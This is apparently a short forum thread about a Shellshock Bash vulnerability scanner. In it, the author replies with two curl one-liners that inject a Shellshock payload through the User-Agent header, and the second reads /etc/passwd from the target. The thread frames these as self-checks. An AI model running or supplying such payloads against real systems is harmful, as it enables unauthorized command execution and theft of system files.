

“Shellshock” Bash exploit scanner/checker - milankragujevic
http://milankragujevic.com/projects/shellshock/

======
MrKnowWon
Any way to have it read from a list of IP's or URL's? Would take entirely too
long to have to do it one at a time in an organization.

------
SchizoDuckie
We need stuff like this for internal networks. I want to do deep checks on
routers. Tips, anyone?

~~~
milankragujevic
Easy: curl -i -X HEAD "[http://[YOUR](http://\[YOUR) LOCAL IP]/" -A '() { :;};
echo "Warning: Server Vulnerable"'

If it shows Warning header, then you can read /etc/passwd with curl -i -X HEAD
"[http://[YOUR](http://\[YOUR) LOCAL IP]/" -A '() { :;}; echo "PASSWD-File: "
$(</etc/passwd)'

